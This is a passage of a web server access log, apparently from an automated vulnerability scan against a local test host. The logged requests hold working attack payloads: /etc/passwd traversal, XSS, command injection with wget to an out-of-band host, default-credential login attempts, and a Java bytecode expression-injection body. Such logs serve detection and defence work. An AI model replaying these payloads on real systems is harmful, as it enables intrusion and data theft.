Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oam/server/opensso/sessionservice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer?elastic=example.com&username= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /kindeditor/php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.production.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"_charset_=utf-8&j_username=replication-receiver&j_password=replication-receiver&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ossim/session/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=probes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"j_username=weblogic&j_password=welcome1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /general/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.php?search=%22;wget+http%3A%2F%2Fc9v8h88smpv8c1ig07h0skjhum8bokm1i.oast.fun%27;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-zoomsounds/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.test.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"_charset_=utf-8&j_username=vgnadmin&j_password=vgnadmin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /control/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.dev.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/media/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"_charset_=utf-8&j_username=author&j_password=author&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-----------------------------253855577425106594691130420583\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22../../../../../tmp/passwd9\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0AMyPasswdNewData->/api/tomcat\x0D\x0A\x0D\x0A-----------------------------253855577425106594691130420583--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:07 +0000","request_body":"{\x22action\x22: \x22coreui_Component\x22, \x22type\x22: \x22rpc\x22, \x22tid\x22: 8, \x22data\x22: [{\x22sort\x22: [{\x22direction\x22: \x22ASC\x22, \x22property\x22: \x22name\x22}], \x22start\x22: 0, \x22filter\x22: [{\x22property\x22: \x22repositoryName\x22, \x22value\x22: \x22*\x22}, {\x22property\x22: \x22expression\x22, \x22value\x22: \x22function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d